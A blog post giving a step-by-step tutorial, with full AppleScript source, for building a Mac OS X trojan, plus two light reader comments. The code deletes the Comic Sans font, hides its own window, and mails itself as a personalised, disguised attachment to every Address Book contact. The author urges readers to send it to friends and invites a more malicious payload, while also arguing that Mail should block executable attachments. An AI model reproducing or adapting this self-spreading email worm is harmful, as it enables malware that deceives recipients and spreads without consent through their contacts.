howto: build your own mac os x trojan


In 13 easy steps:

  1. Start up XCode; if you don’t have the Mac OS X Developer Tools installed, sign up and download them from ADC.
  2. Select “File -> New Project…”

  3. Choose “AppleScript Application”, name it, and choose the location on your hard drive for the project folder. We’re going to call this “SNOB32”.
  4. Double-click “MainMenu.nib”.
  5. Click on the main window — it should be, craftily enough, called “Window” — and pull up the NSWindow Inspector (command-shift-I).
  6. Uncheck “Visible at Launch Time”.
  7. Press command-8 to get to the “AppleScript” portion of the NSWindow Inspector window. Check off “Nib” and check off “SNOB32.applescript” down at the bottom.
  8. Save your NIB file (stands for Next Interface Builder!). Go back to XCode.
  9. Double-click “SNOB32.applescript”.
  10. In the main loop of code, you should now see a block of code that looks like:

    on awake from nib theObject
    (*Add your script here.*)
    end awake from nib

    Essentially, “awake from nib” means “when the application starts”. See the line where it says “(*Add your script here.*)”? You’re going to delete that line and paste this chunk of code in:

    --this does the evil stuff
    tell application "Finder"

    --removes Comic Sans from the /Library/Fonts folder
    try
    move file "Comic Sans MS" in folder "Fonts" in folder "Library" of startup disk to trash
    end try

    --removes Comic Sans from the ~/Library/Fonts folder
    try
    move file "Comic Sans MS" in folder "Fonts" in folder "Library" of home to trash
    end try

    end tell
    --this ends the evil

    --this propagates the trojan via email
    tell application "Address Book"
    launch

    --set some initial variables
    set address_book_email to null

    --get the user's name
    set first_user_name to first name of my card as string
    set last_user_name to last name of my card as string
    set user_name to first_user_name & " " & last_user_name

    --run through all the entries in the address book
    repeat with this_person in every person

    --get the person's personal data out of the address book
    set first_name to first name of this_person as string
    set last_name to last name of this_person as string
    set address_book_entry_name to first_name & " " & last_name

    --get an email listed in the address book
    set email_address_count to count of emails of this_person
    set iterate_email_address_count to 1
    repeat email_address_count times
    set address_book_email to value of email iterate_email_address_count of this_person
    end repeat

    --make sure the entry is not the user
    if address_book_entry_name is not equal to user_name then

    --make sure the entry is not a business
    if address_book_entry_name is not equal to "missing value missing value" then

    --make sure there's an email address to send to
    if address_book_email is not equal to null then

    --start the con
    set subjectLine_string to "Hey, " & first_name & "!" as string
    set messageText_string to return & "Check this out!:" & return & return & "~" & first_user_name & return as string
    set myrecipient_string to address_book_email as string
    set pathscript to path to me

    --create and send the mail
    tell application "Mail"
    set mymail to (make new outgoing message at the beginning of outgoing messages with properties {subject:subjectLine_string, content:messageText_string})
    tell mymail to make new to recipient at beginning of to recipients with properties {address:myrecipient_string}
    tell mymail
    tell content
    make new attachment with properties {file name:pathscript} at after the last word of the the last paragraph
    end tell
    end tell
    set visible of mymail to true
    send mymail
    end tell
    delay 5
    end if
    end if
    end if
    end repeat
    end tell

    quit

  11. Save and close the window. Open the “Info.plist” XML file and add two lines; on line 31, add an entry for NSUIElement surrounded in “key” tags, and in line 32, add an entry for 1 surrounded by “string” tags. Like so:

  12. Up under the “Project” menu, pull down to “Set Active Build Configuration” and select “Release”.
  13. Click “Build”.

…you’ll now have a folder called “SNOB32”; in that folder will be a folder called “Build” and in that folder, “Release”, and in that folder: the dreaded SNOB32.app. Congratulations, you’ve built yourself a trojan*. Mail it off to your Mac-using friends, and suffer their immediate hatred and scorn.

Just so we’re clear; this app will move the user’s copy of “Comic Sans MS” to the trash, then it will use the Apple Address Book and Apple Mail to mail itself to everyone it can find in the user’s address book with an email address. It also uses the information in the address book to add a believable, personalized message to each outgoing message — all the better to trick potential victims. You could even name your project LOLAWESOMEPIC.jpeg and that’s what will show up in the recipient’s mail window.**

Now, because this admittedly sloppy little proof-of-concept app only disables the much-hated font Comic Sans, this could become the first trojan in history that propagates among users willingly. But imagine if the payload was a bit more malevolent?

~jeff

* If you don’t feel like building it yourself, you can download the final trojan horse created by the above code here. REMINDER: YOU ARE DOWNLOADING A TROJAN HORSE. If you’d like to try a test version of the trojan that does everything but actually send the mails, try this one. I am going to p0wn your copy of “Comic Sans”, however.

** To Apple’s credit, Apple Mail does warn the user that they’re opening an executable program, but these days, that’s the very least you can do. Even Microsoft does this. In my opinion: direct execution of attached .app bundles received via email should be explained further, hindered or delayed like the installation of Firefox and Thunderbird extensions, or ideally, disallowed completely.

11 thoughts on “howto: build your own mac os x trojan”

  1. Does this mean that if I have Comic Sans set as the font in which I read email, that I won’t be able to open Mail.app any more?

  2. No, it just means that you’ll be freed from Comic Sans. It’ll show up in whatever’s next in line alphabetically.

    Which means you’ll be left with Courier. Shudder.

Comments are closed.